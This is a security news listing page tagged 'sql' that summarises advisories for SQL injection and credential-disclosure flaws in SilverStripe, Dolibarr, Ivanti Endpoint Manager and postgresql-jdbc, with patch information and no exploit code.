Security
Headlines
HeadlinesLatestCVEs

Tag

#sql

GHSA-xc69-p8fc-m6m5: silverstripe/subsites Unsafe SQL Query Construction (Safe Data Source)

There is a low level potential SQL injection vulnerability in the silverstripe/subsites module has been identified and fixed in version 2.1.1.

ghsa
#sql#vulnerability#git
GHSA-p2v5-xcqm-4fv6: silverstripe/taxonomy SQL Injection vulnerability

There is a vulnerability in silverstripe/taxonomy module that allows SQL injection. This affected controller (`TaxonomyDirectoryController`) is disabled by default and must be enabled by a developer for the exploit to be possible.

GHSA-265q-222x-52m6: silverstripe/framework has potential SQL Injection vulnerability in PostgreSQL database connector

A potential SQL injection vulnerability was identified by using the silverstripe/postgresql database adapter. While unlikely to be exploitable, we have patched silverstripe/framework to ensure that table names are safely escaped before being passed to database adapters or user code.

GHSA-m2hh-2m46-x6j5: silverstripe/framework may disclose database credentials during connection failure

When running SilverStripe 3.7 or 4.x in dev mode with the mysqli database driver, there is a potential to disclose the connection details. We have blacklisted the sensitive parts of the connection information from being included in dev mode stack traces when database errors occur.

GHSA-xx4r-5265-48j6: silverstripe/framework SQL injection in full text search

When performing a fulltext search in SilverStripe 4.0.0 the 'start' querystring parameter is never escaped safely. This exposes a possible SQL injection vulnerability. The issue exists in 3.5 and 3.6 but is less vulnerable, as SearchForm sanitises these variables prior to passing to mysql.

How to Recover Deleted Emails from Exchange Server?

By Waqas Accidentally deleted emails? Don’t panic! This guide explains how to recover them from Exchange Server within the retention… This is a post from HackRead.com Read the original post: How to Recover Deleted Emails from Exchange Server?

GHSA-q8x7-jc3h-p8xc: Dolibarr vulnerable to SQL Injection

Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters in /dolibarr/commande/list.php.

GHSA-c3h9-q3jx-w7fc: Dolibarr vulnerable to SQL Injection

Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters sortorder y sortfield in /dolibarr/admin/dict.php.

Red Hat Security Advisory 2024-3313-03

Red Hat Security Advisory 2024-3313-03 - An update for postgresql-jdbc is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Ivanti Patches Critical Remote Code Execution Flaws in Endpoint Manager

Ivanti on Tuesday rolled out fixes to address multiple critical security flaws in Endpoint Manager (EPM) that could be exploited to achieve remote code execution under certain circumstances. Six of the 10 vulnerabilities – from CVE-2024-29822 through CVE-2024-29827 (CVSS scores: 9.6) – relate to SQL injection flaws that allow an unauthenticated attacker within the same network to